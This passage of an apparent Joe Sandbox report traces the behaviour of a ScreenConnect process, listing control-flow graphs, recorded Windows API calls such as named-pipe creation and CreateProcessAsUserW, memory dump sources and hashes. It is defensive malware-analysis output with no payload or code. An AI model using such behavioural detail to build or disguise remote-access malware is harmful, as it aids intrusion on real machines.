                                                                                        • Instruction ID: fd48f776058cfb6bb11c5cb9360667786bd1341ef8930c5bf321a29575d5c3f1
                                                                                        • Opcode Fuzzy Hash: b3da787346e7fb8a680f0478e1dc7af84e8d726965a07221bc305126b3128c1f
                                                                                        • Instruction Fuzzy Hash: 5E5155B0D00249DFDB10CFA9C948BAEBFF2FB48314F248169E808AB351D7799845CB91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 708 56c03d0-56c042c 710 56c042e-56c0453 708->710 711 56c0480-56c0503 CreateFileA 708->711 710->711 714 56c0455-56c0457 710->714 718 56c050c-56c054a 711->718 719 56c0505-56c050b 711->719 716 56c0459-56c0463 714->716 717 56c047a-56c047d 714->717 720 56c0465 716->720 721 56c0467-56c0476 716->721 717->711 726 56c054c-56c0550 718->726 727 56c055a-56c059c 718->727 719->718 720->721 721->721 722 56c0478 721->722 722->717 726->727 728 56c0552 726->728 731 56c059f-56c05aa 727->731 732 56c0553-56c0559 727->732 728->727 732->727
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 056C04ED
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3298478700.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_56c0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID: 4L]q
                                                                                        • API String ID: 823142352-261793533
                                                                                        • Opcode ID: 33e3541ba72a10493f4afdacca3dbc8c233f46239f7fd361802c101c13cfa0c7
                                                                                        • Instruction ID: ba1fd3d894f405eb8891e3e1c68e3edbdb17f4b362aeda0a2e49b8c73faf9a3b
                                                                                        • Opcode Fuzzy Hash: 33e3541ba72a10493f4afdacca3dbc8c233f46239f7fd361802c101c13cfa0c7
                                                                                        • Instruction Fuzzy Hash: C74123B1D00249DFDB10CFA9C948BAEBFF2FB48314F248169E818AB251D7759845CB91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 734 56c2b40-56c2bcb 740 56c2bdc-56c2bf4 734->740 741 56c2bcd-56c2bda 734->741 742 56c2cb6-56c2ce0 740->742 741->740 745 56c2bf9-56c2c28 RegDisablePredefinedCache 741->745 753 56c2c6d 742->753 754 56c2ce2 742->754 746 56c2c2a-56c2c30 745->746 747 56c2c31-56c2c4c call 56c2608 745->747 746->747 755 56c2c51-56c2c69 747->755 759 56c2c6f 753->759 760 56c2c78 753->760 757 56c2cb4 754->757 758 56c2ce4-56c2cf6 754->758 755->753 757->742 759->760 760->757
                                                                                        APIs
                                                                                        • RegDisablePredefinedCache.ADVAPI32 ref: 056C2C11
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3298478700.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_56c0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID: CacheDisablePredefined
                                                                                        • String ID: `Q]q
                                                                                        • API String ID: 1885667121-1594560043
                                                                                        • Opcode ID: 26beab58139ab5cffd023dd755e1456714c033c006c411b171c39664f124c71a
                                                                                        • Instruction ID: 9245fa5fec76661e5592b1e65e9c01dead3bf40617d801b0411615a20a6e110c
                                                                                        • Opcode Fuzzy Hash: 26beab58139ab5cffd023dd755e1456714c033c006c411b171c39664f124c71a
                                                                                        • Instruction Fuzzy Hash: 74314474E002089FDB14EFA9D854BEEBBB6EF48304F14842DE845AB350DB786845CB91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 770 53135c0-531360a 772 5313612-5313677 CreateNamedPipeW 770->772 773 531360c-531360f 770->773 775 5313680-53136a1 772->775 776 5313679-531367f 772->776 773->772 776->775
                                                                                        APIs
                                                                                        • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 05313664
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3297758805.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_5310000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateNamedPipe
                                                                                        • String ID: 4L]q
                                                                                        • API String ID: 2489174969-261793533
                                                                                        • Opcode ID: 1db4b5a147bcb502099c7e4169e0f0e2779e1932cb4fed22b373f105bd7f7c2e
                                                                                        • Instruction ID: 8abd3a5ff62786f54f1317a750bbdb8050c15121d6ee5d71ca46f442e8d1c5c3
                                                                                        • Opcode Fuzzy Hash: 1db4b5a147bcb502099c7e4169e0f0e2779e1932cb4fed22b373f105bd7f7c2e
                                                                                        • Instruction Fuzzy Hash: 3A3125B18003489FCB10CFAAD484A8EBFF5FF48314F14C459E958AB221C375A955CF61
                                                                                        APIs
                                                                                        • WaitNamedPipeW.KERNEL32(00000000), ref: 05315BEF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3297758805.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_5310000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID: NamedPipeWait
                                                                                        • String ID:
                                                                                        • API String ID: 3146367894-0
                                                                                        • Opcode ID: 4770edc211eaba7929764fcee7b384c16feea1b0b2769fd8a7d2adeff5eeb013
                                                                                        • Instruction ID: 0e39cef66bb5cc7b87e675bdf8a8c75337fa53d79d8bcba9e980ea4607925e30
                                                                                        • Opcode Fuzzy Hash: 4770edc211eaba7929764fcee7b384c16feea1b0b2769fd8a7d2adeff5eeb013
                                                                                        • Instruction Fuzzy Hash: 1631C171A043488FCB14CFAAD850BAEBFB5FF8A310F04806AD809A7341C7799905CFA5
                                                                                        APIs
                                                                                        • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 053102BF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3297758805.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_5310000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcessUser
                                                                                        • String ID:
                                                                                        • API String ID: 2217836671-0
                                                                                        • Opcode ID: 129a00a49f079b609f0f482bd8515bd2de16ef829a48b830417bbce65c8c1ae4
                                                                                        • Instruction ID: 2f6e8fa4db0890120dbb8fe412d8b307db3b787174da852338859c8bb14ec940
                                                                                        • Opcode Fuzzy Hash: 129a00a49f079b609f0f482bd8515bd2de16ef829a48b830417bbce65c8c1ae4
                                                                                        • Instruction Fuzzy Hash: 17414472900249DFCF14CFA9C884ADEBBF2FF48310F14842AE918AB250D775A995CF90
                                                                                        APIs
                                                                                        • ConnectNamedPipe.KERNEL32(00000000), ref: 05315810
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3297758805.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_5310000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConnectNamedPipe
                                                                                        • String ID:
                                                                                        • API String ID: 2191148154-0
                                                                                        • Opcode ID: 2e09f77b6a4506fec9af4bf528387ae3d99d099b1ad4b4c014444f93d812a27d
                                                                                        • Instruction ID: d4b63e5010e4736648dcbb0563289469bd2232ce96c467b847ae34edb7717def
                                                                                        • Opcode Fuzzy Hash: 2e09f77b6a4506fec9af4bf528387ae3d99d099b1ad4b4c014444f93d812a27d
                                                                                        • Instruction Fuzzy Hash: 122123B1D002589FCB18CFAAD484BDEBFF5AF48200F14806AE819BB350DB749945CFA0
                                                                                        APIs
                                                                                        • ConnectNamedPipe.KERNEL32(00000000), ref: 05315810
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3297758805.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_5310000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConnectNamedPipe
                                                                                        • String ID:
                                                                                        • API String ID: 2191148154-0
                                                                                        • Opcode ID: 8f03a553a73b56b7ab46eae575966d5d70fc040613d95888036c715eae096fe2
                                                                                        • Instruction ID: 3190bc23ad95157c745df66cc32081a5d05936412acb67a213d68e5773b21cc5
                                                                                        • Opcode Fuzzy Hash: 8f03a553a73b56b7ab46eae575966d5d70fc040613d95888036c715eae096fe2
                                                                                        • Instruction Fuzzy Hash: 002113B0D002589FCB28CFAAC484B9EBBF5BF48304F148069E819B7350DB749945CFA4
                                                                                        APIs
                                                                                        • WaitNamedPipeW.KERNEL32(00000000), ref: 05315BEF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3297758805.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_5310000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID: NamedPipeWait
                                                                                        • String ID:
                                                                                        • API String ID: 3146367894-0
                                                                                        • Opcode ID: 0467faaf85dd988989b4fee47218a31988029d01ef6913a3bc5386da4366e2b0
                                                                                        • Instruction ID: 9f977f0ebe9e1807a458ad278fde861a55446700ba6fa82329f9662ba01d8667
                                                                                        • Opcode Fuzzy Hash: 0467faaf85dd988989b4fee47218a31988029d01ef6913a3bc5386da4366e2b0
                                                                                        • Instruction Fuzzy Hash: 952103B68002498FDB14CFAAC544AEEBBF4FB89324F14842ED859A7240C779A545CFA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3270054825.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_efd000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9ce603600f42436c1a38f5f3bad65c175b1e805d395299f38e013f1154718740
                                                                                        • Instruction ID: 4b230ccc8eed4805e4e16bcd1836bb61b7c45d83b3fb2e8a0896d3da33d7fa62
                                                                                        • Opcode Fuzzy Hash: 9ce603600f42436c1a38f5f3bad65c175b1e805d395299f38e013f1154718740
                                                                                        • Instruction Fuzzy Hash: D7210671508248DFCB05EF14DDC0B26BF66FB98314F20C569DA095F296C336D815DAA2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3270054825.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_efd000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                        • Instruction ID: 12f66ff8cf29930dc1a1ebe3627cf757d746241495031bd796217f194833c383
                                                                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                        • Instruction Fuzzy Hash: A411E976504284CFCB16DF10D9C4B26BF72FB98314F24C5AAD9090F256C336D856CBA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3270054825.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_efd000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4615f96900ea00445c68cd8d29ffbde2a3fa7d36a2f66c75af325601e372dbd8
                                                                                        • Instruction ID: 8e6491e2cbd927b35953505adbebd2b1656acc4a39176f0847397cfbfa46c861
                                                                                        • Opcode Fuzzy Hash: 4615f96900ea00445c68cd8d29ffbde2a3fa7d36a2f66c75af325601e372dbd8
                                                                                        • Instruction Fuzzy Hash: 7401407100E3C49ED7128B258C94766BFB8EF53224F1D85DBD9889F1A3C2695C49C772
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3270054825.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_efd000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2c74675c0e48ab9bd9b83b85454126fa824160149088ff019f5a6f958bf7d55d
                                                                                        • Instruction ID: eab919982f9e5c0a1b4cfa1c44e89760a705de79b231c1a93d4396e6d88bd6a2
                                                                                        • Opcode Fuzzy Hash: 2c74675c0e48ab9bd9b83b85454126fa824160149088ff019f5a6f958bf7d55d
                                                                                        • Instruction Fuzzy Hash: EB012B310083089EE7208B15CC84B77BF9EEF46324F18C42AEE485B286CA799D01CAB1

                                                                                        Execution Graph

                                                                                        Execution Coverage:12.6%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:5
                                                                                        Total number of Limit Nodes:1
                                                                                        execution_graph 12805 7ff8489d8014 12807 7ff8489d801d 12805->12807 12806 7ff8489d8082 12807->12806 12808 7ff8489d80f6 SetProcessMitigationPolicy 12807->12808 12809 7ff8489d8152 12808->12809

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 635 7ff848ce6f6d-7ff848ce7019 648 7ff848ce701d-7ff848ce7044 635->648 652 7ff848ce7046-7ff848ce70dc 648->652 661 7ff848ce7126-7ff848ce7136 652->661 662 7ff848ce70de-7ff848ce70fa 652->662 668 7ff848ce713c-7ff848ce714a call 7ff848ce0130 661->668 669 7ff848ce7138-7ff848ce713a 661->669 663 7ff848ce7100-7ff848ce711e call 7ff848ce0e70 * 2 662->663 664 7ff848ce7508-7ff848ce7526 call 7ff848ce0e70 * 2 662->664 680 7ff848ce7124-7ff848ce7125 663->680 681 7ff848ce739e-7ff848ce73bc call 7ff848ce0e70 * 2 663->681 682 7ff848ce7632-7ff848ce763d 664->682 683 7ff848ce752c-7ff848ce7533 664->683 672 7ff848ce714d-7ff848ce7162 668->672 669->672 684 7ff848ce7164-7ff848ce7166 672->684 685 7ff848ce7168-7ff848ce718c call 7ff848ce5780 * 2 672->685 680->661 706 7ff848ce73e6-7ff848ce7404 call 7ff848ce0e70 * 2 681->706 707 7ff848ce73be-7ff848ce73c8 681->707 687 7ff848ce7535-7ff848ce7544 683->687 688 7ff848ce7546-7ff848ce7548 683->688 690 7ff848ce718f-7ff848ce71a4 684->690 685->690 687->688 697 7ff848ce754a 687->697 689 7ff848ce754f-7ff848ce7573 688->689 703 7ff848ce7575-7ff848ce7592 689->703 704 7ff848ce75bf-7ff848ce75ef 689->704 701 7ff848ce71a6-7ff848ce71a8 690->701 702 7ff848ce71aa-7ff848ce71ce call 7ff848ce5780 * 2 690->702 697->689 711 7ff848ce71d1-7ff848ce71e6 701->711 702->711 718 7ff848ce763e-7ff848ce76b7 703->718 719 7ff848ce7598-7ff848ce75bd 703->719 738 7ff848ce75f5-7ff848ce7604 call 7ff848ce0130 704->738 739 7ff848ce75f1-7ff848ce75f3 704->739 733 7ff848ce74bb-7ff848ce74c6 706->733 734 7ff848ce740a-7ff848ce7415 706->734 709 7ff848ce73dc 707->709 710 7ff848ce73ca-7ff848ce73da 707->710 715 7ff848ce73de-7ff848ce73df 709->715 710->715 728 7ff848ce71ec-7ff848ce7203 call 7ff848ce5780 711->728 729 7ff848ce71e8 711->729 715->706 743 7ff848ce7700-7ff848ce7756 718->743 744 7ff848ce76b9-7ff848ce76fd 718->744 719->704 735 7ff848ce71ea 728->735 741 7ff848ce7213-7ff848ce7221 728->741 729->735 754 7ff848ce74cc-7ff848ce74db call 7ff848ce0130 733->754 755 7ff848ce74c8-7ff848ce74ca 733->755 756 7ff848ce7417-7ff848ce7419 734->756 757 7ff848ce741b-7ff848ce742a call 7ff848ce0130 734->757 735->741 745 7ff848ce7607-7ff848ce760e 738->745 739->745 761 7ff848ce7227-7ff848ce7235 call 7ff848ce0130 741->761 762 7ff848ce7223-7ff848ce7225 741->762 779 7ff848ce775c-7ff848ce7780 743->779 780 7ff848ce7758-7ff848ce7759 743->780 808 7ff848ce76fe 744->808 751 7ff848ce7610-7ff848ce7621 745->751 752 7ff848ce7623-7ff848ce7624 745->752 764 7ff848ce7626-7ff848ce762b 751->764 752->764 765 7ff848ce74de-7ff848ce74e0 754->765 755->765 766 7ff848ce742d-7ff848ce7461 756->766 757->766 772 7ff848ce7238-7ff848ce724f 761->772 762->772 764->682 765->682 774 7ff848ce74e6-7ff848ce7507 765->774 766->733 777 7ff848ce7463-7ff848ce7468 766->777 772->681 796 7ff848ce7255-7ff848ce725c 772->796 782 7ff848ce746b-7ff848ce7471 777->782 797 7ff848ce77b2-7ff848ce77bb 779->797 798 7ff848ce7782-7ff848ce7791 779->798 780->779 786 7ff848ce7484-7ff848ce748c 782->786 787 7ff848ce7473-7ff848ce747b 782->787 792 7ff848ce748d-7ff848ce748e 786->792 794 7ff848ce749e 786->794 787->792 793 7ff848ce747d-7ff848ce7482 787->793 799 7ff848ce7493-7ff848ce749d call 7ff848ce6da0 792->799 793->799 801 7ff848ce74a4-7ff848ce74b9 794->801 796->681 802 7ff848ce7262-7ff848ce7279 796->802 803 7ff848ce7797-7ff848ce77b1 798->803 804 7ff848ce7793-7ff848ce7794 798->804 799->801 801->733 801->782 811 7ff848ce72ae-7ff848ce72b9 802->811 812 7ff848ce727b-7ff848ce728d 802->812 804->803 808->808 818 7ff848ce72bf-7ff848ce72ce call 7ff848ce0130 811->818 819 7ff848ce72bb-7ff848ce72bd 811->819 816 7ff848ce7293-7ff848ce72a1 call 7ff848ce0130 812->816 817 7ff848ce728f-7ff848ce7291 812->817 822 7ff848ce72a4-7ff848ce72a7 816->822 817->822 820 7ff848ce72d1-7ff848ce72d3 818->820 819->820 824 7ff848ce72d9-7ff848ce72f0 820->824 825 7ff848ce7388-7ff848ce739d 820->825 822->811 824->825 831 7ff848ce72f6-7ff848ce7313 824->831 825->681 834 7ff848ce7315-7ff848ce731d 831->834 835 7ff848ce731f 831->835 836 7ff848ce7321-7ff848ce7323 834->836 835->836 836->825 838 7ff848ce7325-7ff848ce732f 836->838 839 7ff848ce7331-7ff848ce733b call 7ff848ce19e8 838->839 840 7ff848ce733d-7ff848ce7345 838->840 839->681 839->840 841 7ff848ce7347-7ff848ce736c call 7ff848ce5648 840->841 842 7ff848ce7373-7ff848ce7386 call 7ff848ce57a8 840->842 841->842 842->681
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 97024e99bac7ff1ea424e0fba4592e39c5c52183fccd7ecaf738643883275955
                                                                                        • Instruction ID: c4a08ae832f2eedae13aec7170d11ff2f835be24cee836b836f77d19049e5c2c
                                                                                        • Opcode Fuzzy Hash: 97024e99bac7ff1ea424e0fba4592e39c5c52183fccd7ecaf738643883275955
                                                                                        • Instruction Fuzzy Hash: E642FF31E5DA868FE7D9F72894556B92BD2EFA4380F54407AD04DC72D3DF2CA8068389

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3294738051.00007FF8489D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff8489d0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID: MitigationPolicyProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1088084561-0
                                                                                        • Opcode ID: d3d21bea0fc2b36c2b3b5cb43cc2144d2109bfa369684e29b2a40e268b33322e
                                                                                        • Instruction ID: 53d3f9d702b883798fa80689274944b52cd561ab2204c0eb4111540767aea7e0
                                                                                        • Opcode Fuzzy Hash: d3d21bea0fc2b36c2b3b5cb43cc2144d2109bfa369684e29b2a40e268b33322e
                                                                                        • Instruction Fuzzy Hash: C951243190CB488FDB15AFA8984A5E97FE0EF55751F04017EE04AC3293DF78A8468B95

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1062 7ff848ce5e71-7ff848ce5ea4 call 7ff848ce45f0 call 7ff848ce0e70 * 2 1070 7ff848ce6c3e-7ff848ce6c51 1062->1070 1071 7ff848ce5eaa-7ff848ce5eb8 1062->1071 1073 7ff848ce5ebe-7ff848ce5ecd call 7ff848ce0130 1071->1073 1074 7ff848ce5eba-7ff848ce5ebc 1071->1074 1076 7ff848ce5ed0-7ff848ce5ed2 1073->1076 1074->1076 1078 7ff848ce6012-7ff848ce6015 1076->1078 1079 7ff848ce5ed8-7ff848ce5ef4 1076->1079 1080 7ff848ce6150-7ff848ce6157 1078->1080 1081 7ff848ce601b-7ff848ce6026 1078->1081 1079->1078 1099 7ff848ce5efa-7ff848ce5f0c 1079->1099 1085 7ff848ce61e7-7ff848ce61ee 1080->1085 1086 7ff848ce615d-7ff848ce6164 1080->1086 1082 7ff848ce6072-7ff848ce6081 1081->1082 1083 7ff848ce6028-7ff848ce6045 1081->1083 1097 7ff848ce6139-7ff848ce613e 1082->1097 1092 7ff848ce6c5b-7ff848ce6c75 1083->1092 1093 7ff848ce604b-7ff848ce6070 1083->1093 1090 7ff848ce61f0-7ff848ce61f7 1085->1090 1091 7ff848ce61f9-7ff848ce620c 1085->1091 1086->1085 1088 7ff848ce616a-7ff848ce6174 1086->1088 1096 7ff848ce6236-7ff848ce623d 1088->1096 1113 7ff848ce617a-7ff848ce618c 1088->1113 1090->1091 1090->1096 1105 7ff848ce621d-7ff848ce6225 1091->1105 1106 7ff848ce620e-7ff848ce6213 1091->1106 1169 7ff848ce6c76-7ff848ce6c7e 1092->1169 1093->1082 1100 7ff848ce64a1-7ff848ce64a8 1096->1100 1101 7ff848ce6243-7ff848ce624a 1096->1101 1103 7ff848ce6140-7ff848ce6141 1097->1103 1104 7ff848ce6148-7ff848ce6149 1097->1104 1110 7ff848ce5f0e-7ff848ce5f2b 1099->1110 1111 7ff848ce5f5a-7ff848ce5f6a 1099->1111 1100->1070 1107 7ff848ce64ae-7ff848ce64b5 1100->1107 1101->1100 1112 7ff848ce6250-7ff848ce6253 1101->1112 1103->1104 1104->1080 1115 7ff848ce6c91-7ff848ce6df1 1105->1115 1116 7ff848ce622b-7ff848ce622f 1105->1116 1106->1105 1107->1070 1117 7ff848ce64bb-7ff848ce64cd 1107->1117 1124 7ff848ce5f31-7ff848ce5f58 1110->1124 1125 7ff848ce6c52-7ff848ce6c5a 1110->1125 1121 7ff848ce6255-7ff848ce6257 1112->1121 1122 7ff848ce625c-7ff848ce626a 1112->1122 1113->1097 1126 7ff848ce618e 1113->1126 1116->1096 1127 7ff848ce64cf-7ff848ce64ec 1117->1127 1128 7ff848ce6519-7ff848ce6528 1117->1128 1129 7ff848ce630a-7ff848ce630d 1121->1129 1144 7ff848ce626c 1122->1144 1145 7ff848ce626e 1122->1145 1124->1111 1125->1092 1142 7ff848ce64f2-7ff848ce6517 1127->1142 1143 7ff848ce6c7f-7ff848ce6c90 1127->1143 1128->1070 1134 7ff848ce6316-7ff848ce6324 1129->1134 1135 7ff848ce630f-7ff848ce6311 1129->1135 1155 7ff848ce6326 1134->1155 1156 7ff848ce6328 1134->1156 1140 7ff848ce63c5-7ff848ce63cb 1135->1140 1150 7ff848ce63d1-7ff848ce63d3 1140->1150 1151 7ff848ce647d-7ff848ce647f 1140->1151 1142->1128 1143->1115 1146 7ff848ce6270-7ff848ce6273 1144->1146 1145->1146 1153 7ff848ce6275-7ff848ce6308 1146->1153 1154 7ff848ce627d-7ff848ce6288 1146->1154 1150->1151 1152 7ff848ce63d9-7ff848ce647b 1150->1152 1151->1100 1157 7ff848ce6481-7ff848ce6489 1151->1157 1152->1100 1153->1129 1166 7ff848ce62d4-7ff848ce62e4 1154->1166 1167 7ff848ce628a-7ff848ce6295 1154->1167 1161 7ff848ce632a-7ff848ce632d 1155->1161 1156->1161 1157->1100 1165 7ff848ce648b-7ff848ce649e 1157->1165 1173 7ff848ce6337-7ff848ce6342 1161->1173 1174 7ff848ce632f-7ff848ce63c3 1161->1174 1165->1100 1167->1166 1169->1143 1179 7ff848ce6344-7ff848ce6361 1173->1179 1180 7ff848ce638e-7ff848ce639e 1173->1180 1174->1140 1179->1169 1188 7ff848ce6367-7ff848ce638c 1179->1188 1188->1180
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ef45a54ec1e4f5e7090cfc20ec54918426cf2313ef2a83d824c61d8e528a7280
                                                                                        • Instruction ID: 57ecd18b2741689901e78201bd29fb6bad5aa20c89c973e116b53172ad7bfffa
                                                                                        • Opcode Fuzzy Hash: ef45a54ec1e4f5e7090cfc20ec54918426cf2313ef2a83d824c61d8e528a7280
                                                                                        • Instruction Fuzzy Hash: F8121622D1DA5B4FE7D5FA2C6455AF83BC1EF81794F0841B9D48DCB1D7DE2CA8068288
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d61c505b4a172155b11923a5869da6e7923ea42537c710f78a668abd97742213
                                                                                        • Instruction ID: 47847a49a90b4f5e1ca30e3350dbac582dfc256a1cae20a102d0282d9aadd9bd
                                                                                        • Opcode Fuzzy Hash: d61c505b4a172155b11923a5869da6e7923ea42537c710f78a668abd97742213
                                                                                        • Instruction Fuzzy Hash: FAD1A170A1CA4A8FE7E9FA6884957B537D1FF58381F444079E44DCB686DE2CE8428784
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1443090e51ee13e2908b485a7294036e9e7f489d567a76070c9fe2e6f17a609b
                                                                                        • Instruction ID: 07782dde13182b35adb749c4211381864c55d6ebc3f5829492c12c3e16b663f2
                                                                                        • Opcode Fuzzy Hash: 1443090e51ee13e2908b485a7294036e9e7f489d567a76070c9fe2e6f17a609b
                                                                                        • Instruction Fuzzy Hash: 04913432D0DA4B5FEBE9FA2894525B537E1FF95B90F040179D44E87182EE2CB80A83C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 211180d9d2c474a002207639679c531163e500459a1102b1b0bcdd5751215207
                                                                                        • Instruction ID: 42aec0073d74faaaf2eeb028dcd958843ebf1785a1a6ca814ee400ffa73b2ce4
                                                                                        • Opcode Fuzzy Hash: 211180d9d2c474a002207639679c531163e500459a1102b1b0bcdd5751215207
                                                                                        • Instruction Fuzzy Hash: B8715B7271CB1E4FE7A9E92C744517573D0EB993A1F00013ED98AC3686EE29E8474289
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
